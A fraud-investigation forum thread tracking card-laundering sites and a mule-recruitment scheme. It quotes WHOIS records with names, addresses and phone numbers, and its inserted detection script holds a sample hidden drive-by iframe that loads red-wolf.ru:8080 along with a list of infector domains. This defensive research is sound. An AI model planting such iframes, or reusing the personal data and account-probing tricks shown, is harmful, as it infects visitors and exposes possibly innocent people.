
MGD
Premium,MVM
join:2002-07-31
kudos:9

reply to MGD

Re: Ebook websites, fraud charges, Devbill/DigitalAge/Pluto

A new card fraud laundering site in the malware AV theme:

E-RPMSOFT.COM 336-793-0285 »e-rpmsoft.com


»e-rpmsoft.com
Snapped 2009-07-06 17:49:45


-----------------------------------
Name of Company : E-RPMSOFT.COM
Phone : (336) 793-0285
Email : support@e-rpmsoft.com
----------------------------------




Already processing fraud charges as the above voip number forwards to a human answering service.

Forum link spamming:



Active "Deny All" robots file blocking any search archiving.




Some interesting behavior while the operation was being shadowed. Initially the fraud site E-RPMSOFT.COM was hosted on a HOSTNOC.NET US IP 64.191.33.70 leased to ZLATHOST.RU:

-------------------------------
Server Type: nginx/0.6.36
IP Address: 64.191.33.70
IP Location - Pennsylvania - Scranton - Network Operations Center Inc
SSL Cert: zlathost.net.ru expires in 31 days.
-------------------------------

At that time, the domain was registered as follows:


ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM
.
Registration Service Provided By: HIGH QUALITY HOST COMPANY
.
Domain Name: E-RPMSOFT.COM
.
Registrant:
Bausemer ltd.
Stephen Bausemer (st.baus@gmail.com)
17145 North Bay Rd Apt 4405
Sunny Isles
Florida,33160
US
Tel. +786.2741710
.
Creation Date: 18-Mar-2009
Expiration Date: 18-Mar-2010
.
Domain servers in listed order:
ns2.serverside.name
ns1.serverside.name


The domain now shows as suspended, with a different registration, possibly originally carded, though I am not sure:


Domain Name: E-RPMSOFT.COM
.
Registrant:
E-RPMSOFT DOT COM
Ivan Burkin (st.baus@gmail.com)
Krasnobogatirskaya street 79-65
Moscow
Moskovskaya oblast,107076
RU
Tel. +336.7930285
.
Creation Date: 18-Mar-2009
Expiration Date: 18-Mar-2010
.
Domain servers in listed order:
ns2.serverside.name
ns1.serverside.name
.
Status:SUSPENDED
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.

.
However the website is still reachable, now on IP 84.16.228.146:

Domain Name: E-RPMSOFT.COM
-------------------------------
Server Type: nginx/0.6.35
IP Address: 84.16.228.146
IP Location - Berlin - Berlin - Netdirekt E.k
Domain Status: On-hold (generic)
-------------------------------

Also, the manual link spamming for many of the card fraud websites has been originating from an IP address in Chisinau, the capital city of the Republic of Moldova, a former Soviet Bloc state that lies between Ukraine and Romania.




It is also clear that the forum link spammer has additional information that is not listed on the fraud websites. Over a half dozen of the fraud websites have been spammed from Chisinau in Moldova.

E-RPMSOFT.COM is a clone of the not ready for prime time, and now defunct, MRBSOFT.COM previously listed in this 04/28/2009 post


»mrbsoft.com/contact.html
Snapped 2009-04-28 04:44:18


MGD

MGD
Premium,MVM
join:2002-07-31
kudos:9

2 edits

reply to MGD

Another new themed card fraud laundering website design from the organized crime syndicate:

RAGDESIGN.COM 206-666-4778 »ragdesign.com




------------------
RAGDESIGN.COM
ragdesign.com
1-(206)-666-4778
support@ragdesign.com
---------------------




Hosted:

IP Address: 205.178.145.65
IP Location - Virginia - Herndon - Network Solutions Llc
Response Code: 200
Domain Status: Registered And Active Website

Search engine archive blocking:




Again, Multiple Forum spamming from Chisinau, Moldova:




Many posts within the past week:





ICANN Registrar: ACTIVE REGISTRAR, INC.
.
Registration Service Provided By: Active-Domain LLC
.
Domain Name: ragdesign.com
Expiry Date: 25-May-2010
Creation Date: 25-May-2009
.
Name servers:
ns41.worldnic.com
ns42.worldnic.com
.
Registrant Name: kazuko fuller
Registrant Company: ragdesign.com
Registrant Email Address: robyn_wise47@yahoo.com
Registrant Address: 1705 stilton arch
Registrant City: chesapeake
Registrant State/Region/Province: VA
Registrant Postal Code: 23323
Registrant Country: US
Registrant Tel No: +1.9289625224
Registrant Fax No:

.
It is possible that the cyber-mule is named Robyn Wise
.
==============================================

HTFCREATIVE.COM 206-338-2535 »htfcreative.com




------------------
HTFCREATIVE.COM
htfcreative.com
1-(206)-338-2535
support@htfcreative.com
------------------




Registered and hosted via GoDaddy:

IP Address: 72.167.232.34
IP Location - Arizona - Scottsdale - Godaddy.com Inc
Response Code: 200
Domain Status: Registered And Active Website

Search engine archive blocking:




Group forum spamming from Chisinau, Moldova:




Same domain reg as HTFCREATIVE.COM, different email address:


ICANN Registrar: GODADDY.COM, INC.
.
Registrant:
kazuko fuller
1705 stilton arch
chesapeake, Virginia 23323
United States
.
Domain Name: HTFCREATIVE.COM
Created on: 25-May-09
Expires on: 25-May-10
Last Updated on: 25-May-09
.
Administrative Contact:
fuller, kazuko kazuko_fuller@yahoo.com
1705 stilton arch
chesapeake, Virginia 23323
United States
9289625224 Fax -- 9289625224
.
Domain servers in listed order:
NS35.DOMAINCONTROL.COM
NS36.DOMAINCONTROL.COM

.

MGD

MGD
Premium,MVM
join:2002-07-31
kudos:9

reply to MGD
Another card fraud laundering website uncovered:

OLMOSSOFT.COM AKA OLMOS SOFTWARE LLC 281-724-8673


»olmossoft.com
Snapped 2009-08-07 19:15:29


===============================

Name of Company : OLMOSSOFT.COM
Phone : (281) 724-8673
Email : support@olmossoft.com

==============================




The usual search engine blocking:




The cyber-mule and LLC have been traced to a residential address in SHAVANO PARK, TEXAS:


TEXAS DIVISION OF CORPORATIONS
.
32038970763
.
05/11/2009
.
OLMOS SOFTWARE LLC
.
106 LIMESTONE OAK,
SHAVANO PARK,
TX, 78230

.

The fraud domain registration is identical to that of WRISOFT.NET AKA White Royal Indigo LLC 256-251-5229: »Ebook websites, fraud charges, Devbill/DigitalAge/Pluto



ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM
.
Registration Service Provided By:
HIGH QUALITY HOST COMPANY
Contact: +1.6462130098
.
Domain Name: OLMOSSOFT.COM
.
Registrant:
KASSON ltd
SCOT KASSON (s.kasson@mail15.com)
1052 LOVELL AVE
ROSEVILLE
Minnesota,55113
US
Tel. +651.2304612
.
Creation Date: 06-Mar-2009
Expiration Date: 06-Mar-2010
.
Domain servers in listed order:
ns.masterhost.ru
ns2.masterhost.ru
ns1.masterhost.ru

.

Once again forum spammed starting around the end of April:



OLMOSSOFT.COM, WRISOFT.NET and the last dozen fraud websites were all forum spammed from an IP address on starnet.md in Chisinau, Moldova owned by

--------------------------------------
StarNet Internet Solutions Provider

Adresa: str. Maria Cebotari, 28, Chisinau, MD-2012

»www.starnet.md

--------------------------------------

OLMOSSOFT.COM AKA OLMOS SOFTWARE LLC 281-724-8673 was originally hosted in Ukraine, then moved to Russia:

IP Location: Ukraine Tov Data-xata
Resolve Host: webtex-1-a1.data-xata.net
IP Address: 91.197.128.251

Then moved to:

Server Type: Apache
IP Address: 90.156.153.48
IP Location - Moscow City - Moscow - Masterhost.ru
Is A Hosting And Technical Support Organization
Domain Status: Registered And Active Website


Event Date   Action   Pre-Action IP     Post-Action IP
-----------  -------  ----------------  ----------------
2009-03-16   New      -none-            91.197.128.251
2009-05-04   Change   91.197.128.251    90.156.153.48

.

MGD
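Every domain in this thread has been tied to the others by comparing registration records by hand: the same e-mail on both E-RPMSOFT.COM registrations, the same Chesapeake address and phone on RAGDESIGN.COM and HTFCREATIVE.COM, the same reseller behind OLMOSSOFT.COM. The script below is an added example (not part of the original posts) that does that pivot mechanically over a constructed, flattened copy of the records quoted above. The one-block-per-snapshot `key: value` layout is a simplification rather than any registrar's real output; the rule that a shared e-mail, phone or street address merges two domains into one cluster while a shared reseller or nameserver zone is only reported as a weak link is the editor's choice, as are the NANP-style phone normalization (last ten digits) and the street-plus-postal-code address key.

```python
import re
from collections import defaultdict

# Identity-like indicators: a shared value joins domains into one cluster.
STRONG = {"email", "phone", "address"}
# Infrastructure indicators: shared by many unrelated customers, so only reported.
WEAK = {"nameserver", "reseller"}

FIELD_MAP = {
    "registrant email": "email",
    "registrant tel": "phone",
    "registrant address": "address",
    "reseller": "reseller",
    "name server": "nameserver",
}

# Constructed sample: the registrations quoted in this thread, flattened to one
# block per WHOIS snapshot (E-RPMSOFT.COM appears twice, before and after the
# registrant change). Layout is an assumption, not a registrar's format.
SAMPLE_WHOIS = """\
Domain Name: E-RPMSOFT.COM
Registrant Email: st.baus@gmail.com
Registrant Tel: +786.2741710
Registrant Address: 17145 North Bay Rd Apt 4405, Sunny Isles, Florida, 33160, US
Reseller: HIGH QUALITY HOST COMPANY
Name Server: ns2.serverside.name
Name Server: ns1.serverside.name

Domain Name: E-RPMSOFT.COM
Registrant Email: st.baus@gmail.com
Registrant Tel: +336.7930285
Registrant Address: Krasnobogatirskaya street 79-65, Moscow, 107076, RU
Reseller: HIGH QUALITY HOST COMPANY
Name Server: ns2.serverside.name
Name Server: ns1.serverside.name

Domain Name: RAGDESIGN.COM
Registrant Email: robyn_wise47@yahoo.com
Registrant Tel: +1.9289625224
Registrant Address: 1705 stilton arch, chesapeake, VA, 23323, US
Reseller: Active-Domain LLC
Name Server: ns41.worldnic.com
Name Server: ns42.worldnic.com

Domain Name: HTFCREATIVE.COM
Registrant Email: kazuko_fuller@yahoo.com
Registrant Tel: 9289625224
Registrant Address: 1705 stilton arch, chesapeake, Virginia 23323, United States
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM

Domain Name: OLMOSSOFT.COM
Registrant Email: s.kasson@mail15.com
Registrant Tel: +651.2304612
Registrant Address: 1052 LOVELL AVE, ROSEVILLE, Minnesota, 55113, US
Reseller: HIGH QUALITY HOST COMPANY
Name Server: ns.masterhost.ru
Name Server: ns2.masterhost.ru
Name Server: ns1.masterhost.ru
"""


def normalize(kind, value):
    """Canonicalise an indicator so trivially different spellings compare equal."""
    v = " ".join(value.strip().lower().split())
    if kind == "phone":
        digits = re.sub(r"\D", "", v)
        # Assumption: NANP numbers; +1.9289625224 and 9289625224 are the same line.
        return digits[-10:] if len(digits) > 10 else digits
    if kind == "address":
        # Key on street line plus postal code so "VA" vs "Virginia" does not split a match.
        street = " ".join(re.sub(r"[^a-z0-9 ]", " ", v.split(",")[0]).split())
        postal = re.findall(r"\b\d{5,6}\b", v)
        return f"{street}|{postal[-1] if postal else ''}"
    if kind == "nameserver":
        # ns1.example.net and ns2.example.net are one zone, hence one indicator.
        return re.sub(r"^ns\d*\.", "", v)
    return v


def parse_records(text):
    """Turn the flat key: value blocks into (domain, {(kind, value), ...}) pairs."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        domain, indicators = None, set()
        for line in block.splitlines():
            key, _, value = line.partition(":")
            key = key.strip().lower()
            if key == "domain name":
                domain = value.strip().upper()
            elif key in FIELD_MAP:
                kind = FIELD_MAP[key]
                indicators.add((kind, normalize(kind, value)))
        if domain:
            records.append((domain, indicators))
    return records


def pivot(records):
    """Return (clusters, strong_links, weak_links); clusters merge on STRONG indicators only."""
    by_indicator = defaultdict(set)
    for domain, indicators in records:
        for ind in indicators:
            by_indicator[ind].add(domain)
    parent = {domain: domain for domain, _ in records}

    def find(x):  # union-find with path halving
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    strong_links, weak_links = [], []
    for (kind, value), domains in by_indicator.items():
        if len(domains) < 2:
            continue
        link = (kind, value, tuple(sorted(domains)))
        if kind in STRONG:
            strong_links.append(link)
            root = find(link[2][0])
            for d in domains:
                parent[find(d)] = root
        else:
            weak_links.append(link)
    clusters = defaultdict(set)
    for domain in parent:
        clusters[find(domain)].add(domain)
    return (sorted((frozenset(c) for c in clusters.values()), key=sorted),
            sorted(strong_links), sorted(weak_links))


if __name__ == "__main__":
    clusters, strong, weak = pivot(parse_records(SAMPLE_WHOIS))
    for c in clusters:
        print("cluster:", ", ".join(sorted(c)))
    for kind, value, domains in strong:
        print(f"strong link via {kind}={value!r}: {' <-> '.join(domains)}")
    for kind, value, domains in weak:
        print(f"weak link via {kind}={value!r}: {' <-> '.join(domains)}")
```

Run as-is it prints one cluster for RAGDESIGN.COM plus HTFCREATIVE.COM (joined by address and phone), the two other domains alone, and a weak link between E-RPMSOFT.COM and OLMOSSOFT.COM through the shared reseller. Keeping reseller and nameserver out of the merge step is deliberate: a registrar reseller or a hosting company's DNS is shared with thousands of legitimate customers, so treating it as proof of common control would pull innocent domains into the cluster.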

MGD
Premium,MVM
join:2002-07-31
kudos:9

reply to MGD

Another round of forum spamming is ready to start for E-RPMSOFT.COM 336-793-0285 »Ebook websites, fraud charges, Devbill/DigitalAge/Pluto

Within the past 48 hours there have been numerous forum registrations under E-RPMSOFT.COM.


and



Confirmation that the new registrations are once again originating from Moldova can be seen on forums where the member's country of origin is auto-entered based on the geolocation of the applicant's IP address.




Though there are now numerous victim reports of the fraud charging, it is likely that this new round of spamming is intended to counteract the E-RPMSOFT.COM 336-793-0285 operation going into full blast fraud mode. The intent is to push any reference of the fraud charging off the first few pages of Google:

»www.google.com/search?hl=en&q=E-···oq=&aqi=



The posts are all copy and pastes of previous posts on the thread topic. It is obvious that the poster has no command of the English language. Similar postings on Russian forums are however unique and not copies of previous posts.

MGD

MGD
Premium,MVM
join:2002-07-31
kudos:9

reply to iDeceive

Re: Skydex Soft

said by iDeceive:

Here's another mule recruitment email. A quick search of this topic finds no previous mention of "Malenkovsky" or "Skydex". For the record, skydexsoft.com was registered on 07-Aug-2009.
......
..
Absolutely outstanding work my friend !!.

I have been shadowing this operation since you posted. I have confirmed that it is this organized crime syndicate. Though you have reported this operation at a very early stage, unfortunately, I was unable to prevent a massive recruiting operation that began on Friday and is still underway. I am preparing a detailed post of what went on, and the absolute failure of reasonable due diligence that is about to rival the multi-year incompetence of Authorize.net / Cybersource.

said by Whip:

...
They appear to be flooding the net with sales pitches for a site that isn't even online yet. Some are from at least 20 days ago.

Good catch, what you uncovered was part of a set-up plan which included "seeding" of search engines ahead of time. In this case the seeding involved paid posters writing blog comments about the company: fake customer testimonials. This was done in advance as preparation for another stage that would have generated searches from potential cyber-mule recruits. When potential recruits attempt to vet the company by conducting online searches, they will see hundreds of these fake "testimonials", which are intended to dupe them into believing that the job offer is legit.

Secondly, since these fake blog comments began as soon as the domain was registered they will rank ahead of any potential subsequent posts that report this as a scam.

I have tracked the posting origination of many of these manufactured fake blog testimonials to a specific IP address in Moldova. Which coincidentally, is the same country where the forum spam posts listing many of the card fraud laundering domains and their phone numbers originated from.

More to follow.

MGD

==========================================
FRAUD JOB SCAM = SKYDEX SOFT LTD = MULE RECRUIT FRAUD

FRAUD JOB SCAM = SKYDEXSOFT.COM = MULE RECRUIT FRAUD

FRAUD JOB SCAM = Skydex = MULE RECRUIT FRAUD

FRAUD JOB SCAM = Skydex HR Dept. = MULE RECRUIT FRAUD

FRAUD JOB SCAM = career@skydexsoft.com = MULE RECRUIT FRAUD

Head Office:
KIC Plaza
290 Songhu Rd.,YangPu
Shanghai
China
International Business Unit:
BEA Tower
Millennium City 5, 418 Kwun Tong Road, Kwun Tong, Kowloon
Hong Kong
China
tel: +852-8197-7232

FRAUD JOB SCAM = SKYDEX SOFT LTD = MULE RECRUIT FRAUD

FRAUD JOB SCAM = SKYDEXSOFT.COM = MULE RECRUIT FRAUD

FRAUD JOB SCAM = Skydex = MULE RECRUIT FRAUD

FRAUD JOB SCAM = Skydex HR Dept. = MULE RECRUIT FRAUD

FRAUD JOB SCAM = career@skydexsoft.com = MULE RECRUIT FRAUD
==========================================


Doctor Olds
I Need A Remedy For What's Ailing Me.
Premium,VIP
join:2001-04-19
1970 442 W30
kudos:18

said by MGD:

I have tracked the posting origination of many of these manufactured fake blog testimonials to a specific IP address in Moldova. Which coincidentally, is the same country where the forum spam posts listing many of the card fraud laundering domains and their phone numbers originated from.
Not the best place to be.
»www.cia.gov/library/publications···/md.html
Read the sections on "Trafficking in persons:" and "Illicit drugs:"

With the Government being corrupt and a large underground, it is going to be a thorn for a long time. I say cut them off of the tcp/ip grid.
--
What’s the point of owning a supercar if you can’t scare yourself stupid from time to time?

MGD
Premium,MVM
join:2002-07-31
kudos:9

1 edit

reply to MGD

Re: Recruit Fraud: SKYDEX SOFT LTD aka SKYDEXSOFT.COM

********** WARNING !! **********

MALWARE INFECTED, DO NOT VISIT SKYDEXSOFT.COM >http://skydexsoft.com


The website has been under observation for the past two weeks. At 9.00 AM on 09/15/2009 a hidden Iframe drive by malware was detected on the skydexsoft.com website main index page. The hidden Iframe ran a script from >http://red-wolf.ru:8080/index.php. The iframe was embedded in the main page as :




The iframe source domain has been changed several times within the past 72 hours from red-wolf.ru to previous-life.ru to life-before.ru and past-another-life.ru, also suspected is theanotherlife.ru. The path format is identical to the others above.

>http://previous-life.ru:8080/index.php




The last check at ~ 23.00hrs EST 09/18 shows another malware domain




biozavr.ru. As you can see from the server response log below the latest iframe malware domain would have been updated when the site was last saved earlier Friday.

quote:
09/18/09 22:49:15 Browsing >http://skydexsoft.com
Fetching >http://skydexsoft.com/ ...
GET / HTTP/1.1
Host: skydexsoft.com
Connection: close

Date: Sat, 19 Sep 2009 02:46:39 GMT
Server: Apache/1.3.41 (Unix) mod_perl/1.30 PHP/4.4.9 mod_ssl/2.8.31 OpenSSL/0.9.8b
Last-Modified: Fri, 18 Sep 2009 18:20:45 GMT

It is not known if the fake job site skydexsoft.com is self infected, or if it has been hacked. There is at least one report each coming from Australia, France, South Korea, and Iran, from people whose websites have been hacked and infected with the red-wolf.ru specific exploit. The .ru infector domains have dynamic DNS which can point to between 4 and 6 IPs where they are hosted. This is not a known modus-operandi of the crime syndicate with respect to this fraud operation. I am unable to rule anything in or out with respect to skydexsoft.com A typical hack vector for this form of Iframe is via FTP. An example
.

This confirmed crime syndicate's cyber-mule recruit fraud Skydex operation posted by iDeceive is a perfect example of one of the constant engines that drives this non-stop massive organized fraud operation. The primary engine that drives it all, of course, is the organized crime syndicate's constant unfettered hacked access to consumers' full card account data. The most crucial ingredient in processing that hacked data into cash, and laundering it out of the country, is the need for a consistent supply of duped cyber-mules. Consequently a large amount of resources are dedicated to this function, and the process is sophisticated. Not only have job ads been placed on Careerbuilder and Monster, the criminals have also opened business employer accounts with both, which enabled them to filter and peruse their large databases of resumes. Some of the uncovered cyber-mules reported that they were directly targeted from their on-file resumes with these online services.

This confirms the belief that one of the many components required to dismantle this multi-year fraud operation is the alerting and educating of the population via mass media, etc., to this sophisticated recruiting vector. Reducing and eliminating the potential pool of recruits is a crucial ingredient of constricting this multi-million dollar fraud laundering operation.

Let's have a look at the configuration phases of the cyber-mule fraud recruiting operation Skydex Soft Ltd aka skydexsoft.com Alex Malenkovsky career@skydexsoft.com

As noted by iDeceive and Whip, the domain was registered on 08/07/2009 and is hosted in Kiev, Ukraine at IP Address: 195.189.226.159 with hosting/DNS provided by VIP-NAME.COM.UA. The skydexsoft.com cyber-mule recruiting domain was fraudulently registered to a US name and address by someone whose primary language is Russian, via the usual:


ICANN Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM
.
Registration Service Provided By: HIGH QUALITY HOST COMPANY
Contact: +1.6462130098
.
Domain Name: SKYDEXSOFT.COM
.
Registrant:
GLENN llc.
JENNIFER GLENN (jglenn19@gmail.com)
2650 COUNTY ROAD 101
TULELAKE
California,96134
US
Tel. +743.3828992
.
Creation Date: 07-Aug-2009
Expiration Date: 07-Aug-2010
.
Domain servers in listed order:
ns2.vip-name.com.ua

.

Even though the registration, including the email address, all appears to be US based, we can establish that Russian was the primary language of the user from the email account. When the lost password procedure for the Gmail account is activated, the password reset question that was selected at set-up time is in Russian:

Password reminder reset for jglenn19@gmail.com



Translation: "Number of the bus, which I regularly use?"

Within days after the domain registration the search engine seeding began. As mentioned already, hundreds of fake blog testimonial postings were made. These are two of the shorter ones, made on August 13, 2009 on a June businessweek.com article:

quote:
Reader Comments

Jamie Heidlage
August 13, 2009 12:00 PM

Our firm has been working on the internet market for several years,
and we've dealt with a lot of companies during these years, but Skydex
Soft Ltd(www.skydexsoft.com) deserves a special attention. The specialists
from this company work hard in order to please their customers and deliver
the best service. Frankly, we have not seen such qualitative product as
Skydex provides to us. They always meet deadlines for all the project
with the precise accuracy and all wishes carried out. We are happy
with result of their work, and we plan to co-operate with them
further. Now they are in the list of the best companies with which we
deal! We advise to consider this company and see if you can buy it
out.

==============================================

Renae Kaiser
August 13, 2009 03:45 PM

How could you describe the Skydex Soft Ltd(www.skydexsoft.com) activity?
It is the highest quality and fast delivery! This is exactly what is
needed! There is nothing else to add! I have not seen any other company
who would pay so much attention to clients. It is just a simple pleasure
to work with them. They actually are the best in the business! I thank God
that I came to know this company when I was looking who to use to
execute my project. So if you want a qualitative decision of your
problem – you can use this company without any doubt. They have a lot
of talented professionals working there.

Ref: businessweek.com

The purpose is to create a fake history of testimonials, and flood pages of search engines with the results:




Potential recruits will see an extended positive history. Any posts regarding job suspicions or fraud alerts will have to compete with these already established rankings.

The fake skydexsoft.com is hidden from the rest of us:




Where did a majority of these fake postings originate from?

IP 91.214.201.92

IP Information for 91.214.201.92
IP Location: Moldova, Republic Of Srl Roxnet-com
Resolve Host: static-91-214-201-92.roxnet.md
IP Address: 91.214.201.92


Whois Record
inetnum: 91.214.200.0 - 91.214.203.255
netname: ROXNET-COM-NET
descr: SRL ROXNET-COM
descr: Chisinau, Moldova
country: MD
org: ORG-SR21-RIPE
admin-c: IFS1-RIPE
tech-c: IFS1-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: MNT-ROXNET-COM
mnt-routes: MNT-ROXNET-COM
mnt-domains: MNT-ROXNET-COM
source: RIPE # Filtered
.
organisation: ORG-SR21-RIPE
org-name: SRL ROXNET-COM
org-type: OTHER
address: MD-2024
address: Chisinau, Moldova
address: str. T.Vladimiresku 8/1
e-mail:
mnt-ref: MNT-ROXNET-COM
mnt-by: MNT-ROXNET-COM
source: RIPE # Filtered
.
person: Igor F. Spac
address: MD-2024
address: Chisinau, Moldova
address: str.T.Vladimiresku 8/1
e-mail:
phone: +37369409540
phone: +373-22-438819
nic-hdl: IFS1-RIPE
mnt-by: MNT-ROXNET-COM
source: RIPE # Filtered
.
route: 91.214.200.0/22
descr: SRL ROXNET-COM
origin: AS49527
mnt-by: MNT-ROXNET-COM
source: RIPE # Filtered

.
ROXNET.MD



Coincidentally, the same city and country where the numerous forum postings of the various card fraud websites originated from. In that case the seeding was intended to mask postings about the fraud charges. It is my conclusion that the Moldovan blackhat operation is one of hired posters. The quality of that work is sub-par compared to the core operation. Indicative of hired hands are the sloppy methods which leave trails. For example, if you needed additional convincing that the Crayon Web template group, the later anti-virus malware group, and the new ragdesign.com group format were related, you only have to look at samples of the SEO work:




All posted consecutively on the same forum thread from Moldova. Ties them all to one source in a nice package.




We know from iDeceive's posting alert that by 08/26 the syndicate had opened a business account on Monster.com and was sifting through resumes looking for potential cyber-mules for targeting. Once the seeding of the search engines was completed, another phase of the skydexsoft.com fraud recruiting operation began. During the evening hours of Friday September 11th 2009 the first signs of a mass job posting run were detected on Careerbuilder.com.

The posted fraud job:




Note that the job ad included a direct link that, when clicked, opened the application page on skydexsoft.com within a window:




The posting of job ads on careerbuilder.com continued over the weekend. By late Saturday night there were over one hundred and twenty job ads posted for cities around the US:




Even though they list limited Saturday hours, multiple attempts to reach Careerbuilder by phone to get the ads pulled failed. That failure is what prompted me to write in an earlier report that authorize.net / Cybersource was in danger of losing their number one ranking for incompetence relevant to this long-running massive fraud operation. However, in this case there was a positive outcome.

On Sunday 09/13 a stage two phase of job postings began. The reason that this was considered a second phase is that the text of the posted job ad had changed. This may indicate that there were two syndicate members doing the posting. The listed requirements for the job were now different. For example, one of the listed requirements of the first ad stated "Over 30 years of age". On the second phase of the run on Sunday that requirement had changed to "Be over 21 year old".




Also note the apparent embedded error code in the job posting, indicating that the format was prepared on a Computer with a Russian language / keyboard setting:

"normal 0 false false false RU X-NONE X-NONE MicrosoftInternetExplorer4"

The mass Careerbuilder job posting ultimately peaked between midnight Sunday 09/13 and 2AM Monday 09/14 with a total of 153 jobs posted on careerbuilder.com. A search of Careerbuilder's database run around midnight Sunday for "SKYDEX" produced 153 job entries in cities around the US, totalling 7 pages of results:







The fraudulent job ads were targeted at 153 cities across the USA:







Worse yet, during Saturday and Sunday 09/12 & 09/13, the fraudulent cyber-mule recruiting job ads were propagating across many of careerbuilder.com's affiliates, including indeed.com and AOL Jobs. It was crucial to get the careerbuilder source shut down as soon as possible. Shortly after 8AM on Monday 09/14 several reports were sent to careerbuilder.com detailing the mass run of fake job ads and their purpose, along with requests to immediately remove all 153 job ads from their database. Though no direct response was received, by around 11AM all the jobs were removed from the main database. Though all the propagated ads that filtered down through affiliates still existed, all the links to the careerbuilder jobs would be dead.

I am not sure how much this operation cost at careerbuilder, however, an attempt to duplicate what the syndicate had set up, produced an estimate of several thousand dollars. I can not be positive that it was the alert which caused the removal, as no direct reply was received. Nevertheless the fake jobs were removed, and that is what counts.

Continued in next post .....

MGD
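The iframe check described in this post was done by reading the page source by eye and comparing the Last-Modified header against the date the infector domain changed. As an added example (not code from the original post), the script below automates that check over a constructed copy of an index page: it collects every iframe, flags those whose src points off-site, to a non-standard port, or to one of the .ru domains named above, or that are sized or styled so the visitor cannot see them, and parses the Last-Modified header in the form quoted above so the injection can be dated. The sample HTML, the sample headers, the `KNOWN_INFECTORS` watch-list (populated from the domains the post names) and the verdict rule are the editor's assumptions.

```python
import re
from email.utils import parsedate_to_datetime
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains the post names as rotating iframe sources; used here as a watch-list.
KNOWN_INFECTORS = {"red-wolf.ru", "previous-life.ru", "life-before.ru",
                   "past-another-life.ru", "theanotherlife.ru", "biozavr.ru"}

# Inline CSS that makes a frame invisible or pushes it off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)

# Constructed sample page: one ordinary embed and one injected drive-by frame.
SAMPLE_PAGE = """<html><head><title>Skydex Soft Ltd</title></head><body>
<h1>Careers</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<p>Apply today.</p>
<iframe src="http://red-wolf.ru:8080/index.php" width="1" height="1" frameborder="0"
 style="visibility:hidden;position:absolute;left:-9999px"></iframe>
</body></html>"""

# Constructed response headers in the shape quoted in the post.
SAMPLE_HEADERS = {
    "Date": "Sat, 19 Sep 2009 02:46:39 GMT",
    "Server": "Apache/1.3.41 (Unix) mod_perl/1.30 PHP/4.4.9",
    "Last-Modified": "Fri, 18 Sep 2009 18:20:45 GMT",
}


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for width/height of 0 or 1 pixel, the classic drive-by footprint."""
    digits = re.sub(r"\D", "", value or "")
    return digits != "" and int(digits) <= 1


def analyze_iframes(html, site_host):
    """Return one finding per iframe: its src, why it looks injected, and a verdict."""
    site_host = site_host.lower()
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        try:
            port = parts.port
        except ValueError:  # garbage port string; still worth a look
            port = -1
        reasons = set()
        if host and host != site_host and not host.endswith("." + site_host):
            reasons.add("external")
        if port not in (None, 80, 443):
            reasons.add("nonstandard-port")
        if host in KNOWN_INFECTORS:
            reasons.add("known-infector")
        if _is_tiny(attrs.get("width")) or _is_tiny(attrs.get("height")):
            reasons.add("tiny-size")
        if HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.add("hidden-style")
        # An off-site frame is normal; an off-site frame nobody is meant to see is not.
        suspicious = bool(reasons & {"nonstandard-port", "known-infector",
                                     "tiny-size", "hidden-style"})
        findings.append({"src": src, "reasons": reasons, "suspicious": suspicious})
    return findings


def last_modified(headers):
    """Parse Last-Modified so the injection can be dated against logs or backups."""
    value = headers.get("Last-Modified")
    return parsedate_to_datetime(value) if value else None


if __name__ == "__main__":
    for f in analyze_iframes(SAMPLE_PAGE, "skydexsoft.com"):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['src']}  {sorted(f['reasons'])}")
    print("page last modified:", last_modified(SAMPLE_HEADERS))
```

The verdict deliberately does not fire on "external" alone, since embeds from video or map providers are off-site by nature; what marks the drive-by is an off-site frame on an odd port that the page goes out of its way to hide. Comparing the parsed Last-Modified time with the server's access and FTP logs for that minute is the quickest way to decide the question the post leaves open, whether the site owner planted the frame or someone with stolen FTP credentials did.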

MGD
Premium,MVM
join:2002-07-31
kudos:9

2 edits

reply to MGD

Re: Ebook websites, fraud charges, Devbill/DigitalAge/Pluto

said by music man:

.............
You mentioned the UK!! You have my full attention!
.
Interesting that you mention the UK; though I have repeatedly searched, I have not seen any actual UK based operation from this crime syndicate since the 2008 UK Strawberry card fraud operation, which you had a bird's eye view of from its birth. I suspect there may be some, as they are difficult to detect in this form of stealth mode. What does occur from time to time is UK card victim data is run through the fraudulent US merchant accounts. The lack of noise is probably due to the fact that the data is dispersed and mixed simultaneously through multiple card fraud laundering entities of the crime syndicate.

Ironically, I ran across just such an example of UK victims a few days ago during the unmasking of the latest tangible items fraud laundering group. A financial security systems insider with whom I have collaborated over the last two years has been vigorously preventing and shutting down the organized crime syndicate's card fraud laundering entities. This individual, who is now an expert on sniffing them out of the system, has done more by far than anyone on the inside in disrupting and preventing the crime syndicate from functioning. They are the unsung hero when it comes to who has been the most effective at targeting the card fraud laundering operation. In fact, it was they who went above and beyond the call of duty, and spent hours tracking down and terminating the accounts of the half-decade-long fraud operation of KCSOFTWARECOM LLC aka KCSOFTLLC.COM.

